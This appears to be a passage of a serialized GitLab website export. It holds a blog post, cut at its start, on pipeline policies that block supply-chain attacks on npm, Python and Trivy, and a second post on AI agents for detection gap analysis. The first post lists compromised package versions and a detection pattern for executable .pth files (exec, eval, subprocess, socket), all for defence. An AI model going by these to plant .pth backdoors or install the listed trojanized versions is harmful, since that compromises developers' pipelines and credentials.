policy](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/dependency-integrity.gitlab-ci.yml) injects .pipeline-policy-pre jobs that auto-detect the package ecosystem (npm or Python) and perform three checks:\n\n**For npm projects** (triggered by `package-lock.json`, `yarn.lock`, or `pnpm-lock.yaml`):\n\n1. **Lockfile integrity.** Runs `npm ci --ignore-scripts`, which fails if `node_modules` would differ from what the lockfile specifies. This catches cases where package.json was updated but the lockfile was not regenerated, and also verifies SRI integrity hashes.\n2. **Blocked package scan.** Cross-references the lockfile’s full dependency tree against `blocked-packages.yml`, a GitLab-maintained list of known-compromised package versions. The shipped blocklist includes `axios@1.14.1`, `axios@0.30.4`, and `plain-crypto-js@4.2.1`.\n3. **Undeclared dependency detection.** After install, compares the contents of node_modules against the lockfile. Any package present on disk but absent from the lockfile indicates tampering (e.g., a compromised postinstall script that fetches additional packages).\n\n**For Python projects** (triggered by `requirements.txt`, `Pipfile.lock`, `poetry.lock`, or `uv.lock`):\n\n1. **Lockfile integrity.** Installs in an isolated virtual environment and verifies that the install succeeds from the lockfile.\n2. **Blocked package scan.** Same blocklist approach. The shipped list includes `litellm==1.82.7` and `litellm==1.82.8`.\n3. **.pth file detection.** Scans site-packages for `.pth` files containing executable code patterns (`import os`, `exec(`, `eval(`, `__import__`, `subprocess`, `socket`). This is the exact mechanism the LiteLLM backdoor used.\n\nWhen a violation is found:\n\n```text\n=============================================\nFAILED: 1 violation(s) found\n=============================================\nBLOCKED: axios@1.14.1 is a known-compromised package\n\nThis check is enforced by a Pipeline Execution Policy.\n```\n\nThe policy runs in *strict mode*: any dependency not present in the committed lockfile blocks the pipeline. If a developer needs to add a dependency, they commit the updated lockfile. The policy verifies that the installed version matches the committed version. If something appears that was not committed (e.g., a transitive dependency injected via a compromised upstream package), the pipeline blocks.\n\n**What this catches:** The introduction of `plain-crypto-js` as a new, previously unseen dependency would be flagged by the undeclared dependency check. The `axios@1.14.1` version would be caught by the blocked package scan. The LiteLLM `.pth` file would be caught by the `.pth` detection check. Each attack has at least one, and often two, independent detection signals.\n\n### Use case 3: Detect and block compromised tools before execution\n\n**Problem:** TeamPCP replaced trusted Trivy and Checkmarx GitHub Action tags with malicious versions. Any pipeline referencing those tags executed credential-stealing malware.\n\n**PEP approach:** The [Tool Integrity policy](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies/-/blob/main/tool-integrity.gitlab-ci.yml) injects a `.pipeline-policy-pre` job that queries the GitLab CI Lint API (or falls back to evaluate the `.gitlab-ci.yml`), extracts the container image references, and compares it against an approved images allowlist maintained by the security team.\n\nThe allowlist (`approved-images.yml`) supports three controls per image:\n\n**Approved repositories:** Only images from repositories on the list are permitted. An unknown repository blocks the pipeline.\n\n**Allowed tags:** Only specific tags are permitted within an approved repository. This prevents drift to untested versions.\n\n**Blocked tags:** Known-compromised versions can be explicitly blocked even if the repository is approved. The shipped allowlist blocks `aquasec/trivy:0.69.4` through `0.69.6`, the exact versions TeamPCP trojanized.\n\nWhen a violation is found, the pipeline fails before any other job runs:\n\n```text\n=============================================\nFAILED: 1 violation(s) found\n=============================================\nBLOCKED: aquasec/trivy:0.69.4 (job: trivy-scan)\n\n - tag '0.69.4' is known-compromised\n\nThis check is enforced by a Pipeline Execution Policy.\n```\n\nThe allowlist is maintained via MRs against the policy project. To add a new approved image, the security team opens an MR. To respond to a new compromise, they add a blocked tag. No code changes required, just YAML.\n\n**What this catches:** When images with unapproved tags are detected, the policy compares the image repository names and tags to an allowlist. A failed match blocks the pipeline before any scanner executes, preventing credential exfiltration.\n\n*Note: By extending the sample above, PEPs can be used to force pinning to digests over tags, which is immune to force pushes. This sample demonstrates a more basic tag-based enforcement pattern.*\n\n## Beyond PEPs: GitLab’s supply chain defenses\n\nPipeline Execution Policies are the enforcement layer, but they work best as part of a broader defense-in-depth strategy. GitLab provides several capabilities that complement PEPs for supply chain protection:\n\n### Secret detection\n\n[GitLab secret detection](https://docs.gitlab.com/user/application_security/secret_detection/) prevents credentials from landing in the repository in the first place, significantly reducing what a compromised pipeline tool can harvest. In the context of the March 2026 attacks:\n\n* Credentials stored in repositories are both easier for attackers to discover and slower to rotate. The Trivy incident showed that even the rotation process can be exploited: Aqua Security's rotation was not atomic, and the attacker captured newly issued tokens before the old ones were fully revoked. GitLab Secret Detection includes automatic revocation for leaked GitLab tokens and a partner API that notifies third-party providers to revoke their credentials, accelerating response when a breach does occur.\n\n* Secret detection combined with proper secret management (short-lived tokens, vault-backed credentials, minimal pipeline secret exposure) limits what an attacker can reach even when a trusted tool turns hostile.\n\n### Dependency scanning via software composition analysis (SCA)\n\nGitLab [dependency scanning](https://docs.gitlab.com/user/application_security/dependency_scanning/) identifies known vulnerabilities in project dependencies by analyzing lockfiles and manifests. In the context of the March 2026 attacks:\n\n* For LiteLLM, the compromised versions (1.82.7, 1.82.8) are tracked in GitLab's advisory database, flagging affected Python projects automatically.\n\n* For axios, dependency scanning identifies the compromised versions (1.14.1, 0.30.4) across every project in the organization, giving security teams a single view for assessing blast radius and prioritizing credential rotation.\n\n* Similarly, all npm packages compromised by TeamPCP's CanisterWorm propagation are also flagged if used.\n\n[GitLab Container Scanning](https://docs.gitlab.com/user/application_security/container_scanning/) detects vulnerable container images used in your deployments. For the Trivy compromise, Container Scanning flags the trojanized Trivy Docker images (0.69.4 through 0.69.6) when they appear in your container registry or deployment manifests.\n\n### Merge request approval policies\n\n[Merge request approval policies](https://docs.gitlab.com/user/application_security/policies/merge_request_approval_policies/) can require security team approval before changes to dependency lockfiles or CI/CD configurations are merged. This ensures a human checkpoint for the types of changes that supply chain attacks typically introduce.\n\n### Coming soon: Dependency Firewall, Artifact Registry, and SLSA Level 3 Attestation & Verification\n\nUpcoming GitLab supply chain security capabilities harden policy enforcement at two critical control points: the registry and the pipeline. The Dependency Firewall and Artifact Registry will block non-conforming packages, while SLSA Level 3 attestation will provide cryptographic proof that artifacts were produced by approved pipelines and remain unmodified. Together, they will give security teams verifiable control over what enters and exits the software supply chain.\n\n## What this means for your organization\n\nAmidst rising AI-assisted threats, attacks on CI/CD pipelines are becoming commonplace. The TeamPCP campaign shows how a single compromised credential can cascade across an ecosystem of trusted tools.\n\nIf your organization used any of the affected components, operate with the assumption that all of your pipeline secrets were exposed: rotate them immediately and audit systems for persisted backdoors. Either way, regularly rotating credentials and using short-lived tokens limits the blast radius of any future compromise.\n\nHere is what we recommend:\n\n1. **Pin dependencies to checksums, when possible.** Mutable version tags (like the ones TeamPCP hijacked) are not a security boundary. Use SHA-pinned references for all [CI/CD components](https://docs.gitlab.com/ci/components/#manage-dependencies) or actions and container images.\n\n2. **Run pre-execution integrity checks.** Use Pipeline Execution Policies to verify tool and dependency integrity *before* any pipeline job runs. This is the `.pipeline-policy-pre` stage.\n\n3. **Audit what you publish.** Every package publish step should include automated validation of the artifact contents. Source maps, environment files, and internal configuration should never leave your build environment. The [Supply Chain Policy](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies) project provides a ready-to-deploy starting point for npm, Docker, and Helm artifacts.\n\n4. **Detect dependency drift.** Compare dependency resolutions against committed lockfiles on every pipeline run. Monitor for unexpected new dependencies.\n\n5. **Centralize policy management.** Do not rely on developers remembering to include security checks. Enforce them at the group or instance level through policies that developers cannot remove or skip.\n\n6. **Assume your security tools are targets.** If your vulnerability scanner, static application security testing (SAST) tool, or AI gateway can be compromised, it will be. Limit each tool to its least necessary privileges and verify that it can't reach anything else.\n\n## Protect your pipelines with GitLab\n\nOver two weeks, attackers compromised production pipelines at organizations running some of the most widely adopted tools in the software development ecosystem.\n\nThe lesson is clear: Build pipelines need the same degree of centralized, policy-driven protection that we apply to networks and cloud infrastructure.\n\nGitLab Pipeline Execution Policies provide that enforcement layer. They ensure that security checks run on every pipeline, in every project regardless of individual project configurations. Combined with dependency scanning, secret detection, and merge request approval policies, they can block, detect, and contain the class of attacks we saw in March 2026.\n\nThe [Supply Chain Policies](https://gitlab.com/gitlab-org/security-risk-management/security-policies/projects/supply-chain-policies) project provides a working Pipeline Execution Policy that catches the exact class of error behind the major AI company’s leak, with coverage for npm packages, Docker images, and Helm charts. Clone it, deploy it to your group, and ensure that all of your pipelines are ready for the supply chain attacks to come.\n\nTo get started with centralized pipeline policies, sign up for a [free trial of GitLab Ultimate](https://about.gitlab.com/free-trial/devsecops/).\n\n\n*This blog post contains \"forward-looking statements\" within the meaning of Section 27A of the Securities Act of 1933, as amended, and Section 21E of the Securities Exchange Act of 1934. Although we believe that the expectations reflected in these statements are reasonable, they are subject to known and unknown risks, uncertainties, assumptions and other factors that may cause actual results or outcomes to differ materially. Further information on these risks and other factors is included under the caption \"Risk Factors\" in our filings with the SEC. We do not undertake any obligation to update or revise these statements after the date of this blog post, except as required by law.*","Pipeline security lessons from March supply chain incidents","Learn how centralized pipeline policies can detect and block the patterns behind a series of recent attacks.",[22,738,739,24],[749],"Grant Hickman","https://res.cloudinary.com/about-gitlab-com/image/upload/v1772630163/akp8ly2mrsfrhsb0liyb.png","2026-04-07",{"featured":32,"template":14,"slug":753},"pipeline-security-lessons-from-march-supply-chain-incidents",{"content":755,"config":765},{"body":756,"category":11,"date":757,"tags":758,"title":760,"description":761,"authors":762,"heroImage":764},"After an incident wraps up, every incident response or security operations center faces the same uncomfortable question: What did we miss, and why? Answering that question well takes real work — someone has to read through the incident timeline, map the attacker's actions to detection opportunities, identify the alerts that should have fired but didn't, and translate those findings into concrete improvements. Done manually, it's time-consuming, inconsistent, and easy to deprioritize when the next incident is already knocking.\n\nAt GitLab, our Signals Engineering team is responsible for building and maintaining the detections that protect the platform and the company. We deal with the same detection gap problem that every security team does so we’ve automated detection gap analysis with [GitLab Duo Agent Platform](https://about.gitlab.com/gitlab-duo-agent-platform/) to improve our assessment of those gaps and how we can close them.\n\nIn this article, you'll learn our strategy, which includes two AI agents you can use in your environment: the built-in Security Analyst Agent and a custom agent we built and named the Detection Engineering Assistant.\n\n\n## The detection gap problem\n\nA detection gap is exactly what it sounds like: an attacker took an action, and your detections didn't catch it. Gap analysis is the process of systematically reviewing security incidents to identify those missed opportunities and determine what new or improved detections would close them.\n\nThe challenge isn't that gap analysis is conceptually hard. It's that it requires careful, methodical reading of incident data and mapping those events to your detection coverage. For a single incident, a skilled analyst can do it well. But across a steady stream of incidents, with multiple engineers contributing, it's difficult to maintain consistency and easy to let the review become shallow.\n\nWe wanted a process that was repeatable, thorough, and embedded directly in the workflow where our security incidents already live: GitLab issues.\n\n## What is GitLab Duo Agent Platform?\n\n[GitLab Duo Agent Platform](https://about.gitlab.com/blog/gitlab-duo-agent-platform-is-generally-available/) is GitLab's framework for building and deploying agentic AI agents that can reason, take actions, and integrate natively with GitLab resources like issues, merge requests, and code. Unlike a simple chat interface, agents in Duo Agent Platform can be given specific roles, domain knowledge, and access to tools, making them effective for domain-specific workflows like security operations.\n\nGitLab Duo Agent Platform gives you two practical paths:\n\n1. **Use a pre-built agent** — GitLab ships several out-of-the-box agents, including a Security Analyst Agent designed for security-related tasks.  \n2. **Build your own agent** — You can create a custom agent in just a few minutes by giving it a name, a description, and a system prompt. The system prompt is where the real power lies.\n\nBoth paths are viable for detection gap analysis. Let's look at each.\n\n## 1. Security Analyst Agent\n\nThe easiest way to get started is with [Security Analyst Agent](https://docs.gitlab.com/user/duo_agent_platform/agents/foundational_agents/security_analyst_agent/), which comes pre-configured with security domain knowledge and can be invoked directly from a GitLab issue.\n\nTo use the agent for gap analysis, we navigate to a closed incident issue and ask the agent to review the incident description, timeline, tasks, and comments to identify where detections were absent or insufficient. The agent reads the issue content — including comments, linked artifacts, and timeline details — and reasons over it to surface potential gaps. It can identify undetected tactics, techniques, and procedures (TTPs) mapped to MITRE ATT&CK and suggest areas where new detection rules could improve coverage.\n\nThis works well for a quick first pass, especially if your incident issues are well-documented. Security Analyst Agent is knowledgeable about general security concepts, common attacker behaviors, and detection principles. For teams just getting started with AI-assisted operations, it provides immediate value with no configuration required.\n\nThat said, the pre-built agent doesn't know your specific environment, including your SIEM, your log sources, your detection stack, or your team's detection engineering standards. For us, that meant the recommendations, while valid in general, sometimes missed the specific context we needed to translate them into actionable detections. That's what led us to build our own agent.\n\n## 2. Building the Detection Engineering Assistant\n\n[Creating a custom agent in GitLab Duo Agent Platform](https://docs.gitlab.com/user/duo_agent_platform/agents/custom/) is surprisingly straightforward. From the Duo Agent Platform interface, you give the agent a name (we called ours the **Detection Engineering Assistant**), a brief description, and a system prompt. That's it. The agent is ready to use.\n\nThe system prompt is the most important part. It's the agent's knowledge base: everything it knows about your team, your environment, your standards, and how it should reason about its work. A thin, vague system prompt produces thin, vague output. A verbose, carefully crafted system prompt produces an agent that behaves like a knowledgeable member of your team.\n\nHere's the approach we took when writing our system prompt for the Detection Engineering Assistant:\n\n### Define the agent's role and scope clearly\n\nWe opened the system prompt by telling the agent exactly what it is and what it's responsible for. Not just \"you are a security analyst.\" We specifically prompted: \"You are a detection engineering assistant for GitLab's Signals Engineering team, responsible for analyzing security incidents and identifying gaps in our detection coverage.\" This framing anchors every response it produces.\n\n### Encode your detection philosophy\n\nWe wrote out what \"a good detection\" means to us: low false positive rates, high signal fidelity, and actionable alerts that provide responders with the context they need. We explained our preference for behavioral detections over IOC-based detections where possible, and described how we think about the tradeoff between coverage breadth and alert fatigue.\n\n### Give it context on your tech stack and log sources\n\nAn agent can only recommend what you can actually build. We told the agent which log sources we ingest, what our SIEM looks like, and what data is and isn't available to us. This means when it recommends a new detection, it does so in terms of what we can actually implement, not hypothetical telemetry we don't have.\n\n### Ground it in MITRE ATT&CK\n\nWe told the agent to organize its gap findings using ATT&CK tactics and techniques. This gives us consistent, structured output that maps directly to how we track coverage internally, and makes it easy to prioritize which gaps to address first.\n\n### Set expectations for output format\n\nWe specified exactly what we want the agent to produce: a structured list of detection gaps, each with the relevant ATT&CK technique, a description of what was missed, the log source or data that could support a detection, and a recommended approach. A consistent output format makes the findings easier to triage and turn into engineering work.\n\n### Example system prompt excerpt\n\n*Note: Our full Detection Engineering Assistant system prompt is 1,870 words and 337 lines. The example below is just a small example of what a full custom system prompt can be.* \n\n\n```text\nYou are the Detection Engineering Assistant for GitLab's Security Operations team. Your role is to analyze closed security incidents and identify gaps in our detection capabilities.\n\nWhen reviewing an incident, you should:\n1. Identify each distinct attacker action or technique described in the incident timeline\n2. For each action, assess whether our existing detections would have caught it\n3. For any action that would not have been detected, document it as a detection gap\n\nFor each gap, provide:\n- MITRE ATT&CK Technique ID and name (e.g., T1078 - Valid Accounts)\n- A plain-language description of what happened and why it wasn't detected\n- The log source or telemetry that could support a detection (e.g., authentication logs, process execution events, network flow data)\n- A recommended detection approach, written in terms our SIEM can implement\n\nOur SIEM ingests [log sources]. Our detection standards prioritize behavioral patterns over static IOCs. Avoid recommending detections that would generate significant false positives without a high-confidence tuning path...\n```\n\nA system prompt this specific produces dramatically more useful output than a generic one. The agent stops giving you general security advice and starts giving you detection engineering recommendations.\n\n## Running gap analysis on incidents\n\nWith the Detection Engineering Assistant configured, the workflow is simple. At the close of an incident, we open the incident issue in GitLab and invoke the assistant. It reads the full issue — the incident summary, timeline, investigative notes, and any linked resources — and returns a structured gap analysis.\n\nA typical output looks like this:\n\n**Gap: Lateral movement via valid credentials not detected**\n\n* **ATT&CK:** T1078.004 — Valid Accounts: Cloud Accounts  \n* **What happened:** An attacker used a valid access token to authenticate to an auxiliary GitLab instance. No alert fired because we lacked authentication baseline detections for that instance.  \n* **Log source:** Authentication logs from `example.gitlab.com`  \n* **Recommended approach:** Create a detection that alerts on first-time authentication from a user account to `example.gitlab.com` within a 90-day rolling window, with suppression for accounts with established access patterns.\n\nThis kind of structured output goes directly into our engineering backlog. We treat the agent's analysis as a high-quality first draft. It gets reviewed by a human engineer who validates the findings, checks whether gaps are already covered by detections we haven't documented, and adds context before it becomes an engineering issue. But the hard work of reading the incident and generating the initial findings is automated.\n\n## What we've learned\n\nA few things stand out from building and iterating on this workflow:\n\n**The system prompt is a living document** — Every time the agent produces an output that misses something obvious or gets the framing wrong, we update the prompt. The agent's quality is a direct reflection of how well we've encoded our domain knowledge into it.\n\n**Incident documentation quality matters** — An agent can only reason over what's written down. Incidents with detailed, structured timelines produce much better gap analysis than sparse or informal ones. Building the gap analysis workflow created an unexpected second benefit: it gave us a concrete reason to improve our incident documentation standards.\n\n**This is a force multiplier, not a replacement** — The Detection Engineering Assistant doesn't replace a skilled detection engineer, but it does amplify one. The engineer still reviews the findings, validates the recommendations, and makes the final call on what goes into the backlog. But the time spent on the initial analysis drops significantly, and the consistency across incidents improves.\n\n## Get started\n\nIf you want to build your own detection gap analysis agent, here's where to start:\n\n1. Review your last three to five closed incidents and note what a good gap analysis would have surfaced for each.  \n2. Use those observations to draft a system prompt that encodes your environment, standards, and preferred output format.  \n3. Create a [custom agent](https://docs.gitlab.com/user/duo_agent_platform/agents/custom/) in GitLab Duo Agent Platform with your prompt.  \n4. Run it against one of your incidents and iterate on the prompt based on the output.\n\nThe detection gap problem isn't going away. But with GitLab Duo Agent Platform, you can make the analysis repeatable, consistent, and embedded directly in the place where your security work already happens. \n\n> Start [a free trial of GitLab Duo Agent Platform](https://about.gitlab.com/gitlab-duo-agent-platform/) today!\n","2026-03-10",[22,23,739,759,24,738,545],"AI/ML","Automating detection gap analysis with GitLab Duo Agent Platform","Learn how GitLab's Signals Engineering team uses our AI platform to automatically surface detection gaps from security incidents — no manual review required.",[763],"Matt Coons","https://res.cloudinary.com/about-gitlab-com/image/upload/v1773147991/op5xyroonltdwqix0x3u.png",{"featured":13,"template":14,"slug":766},"automating-detection-gap-analysis-with-gitlab-duo-agent-platform",{"promotions":768},[769,783,794,805],{"id":770,"categories":771,"header":773,"text":774,"button":775,"image":780},"ai-modernization",[772],"ai-ml","Is AI achieving its promise at scale?","Quiz will take 5 minutes or less",{"text":776,"config":777},"Get your AI maturity score",{"href":778,"dataGaName":779,"dataGaLocation":250},"/assessments/ai-modernization-assessment/","modernization assessment",{"config":781},{"src":782},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/qix0m7kwnd8x2fh1zq49.png",{"id":784,"categories":785,"header":786,"text":774,"button":787,"image":791},"devops-modernization",[738,580],"Are you just managing tools or shipping innovation?",{"text":788,"config":789},"Get your DevOps maturity score",{"href":790,"dataGaName":779,"dataGaLocation":250},"/assessments/devops-modernization-assessment/",{"config":792},{"src":793},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138785/eg818fmakweyuznttgid.png",{"id":795,"categories":796,"header":797,"text":774,"button":798,"image":802},"security-modernization",[22],"Are you trading speed for security?",{"text":799,"config":800},"Get your security maturity score",{"href":801,"dataGaName":779,"dataGaLocation":250},"/assessments/security-modernization-assessment/",{"config":803},{"src":804},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/p4pbqd9nnjejg5ds6mdk.png",{"id":806,"paths":807,"header":810,"text":811,"button":812,"image":817},"github-azure-migration",[808,809],"migration-from-azure-devops-to-gitlab","integrating-azure-devops-scm-and-gitlab","Is your team ready for GitHub's Azure move?","GitHub is already rebuilding around Azure. Find out what it means for you.",{"text":813,"config":814},"See how GitLab compares to GitHub",{"href":815,"dataGaName":816,"dataGaLocation":250},"/compare/gitlab-vs-github/github-azure-migration/","github azure migration",{"config":818},{"src":793},{"header":820,"blurb":821,"button":822,"secondaryButton":827},"Start building faster today","See what your team can do with the intelligent orchestration platform for DevSecOps.\n",{"text":823,"config":824},"Get your free trial",{"href":825,"dataGaName":49,"dataGaLocation":826},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/","feature",{"text":516,"config":828},{"href":53,"dataGaName":54,"dataGaLocation":826},1777934792006]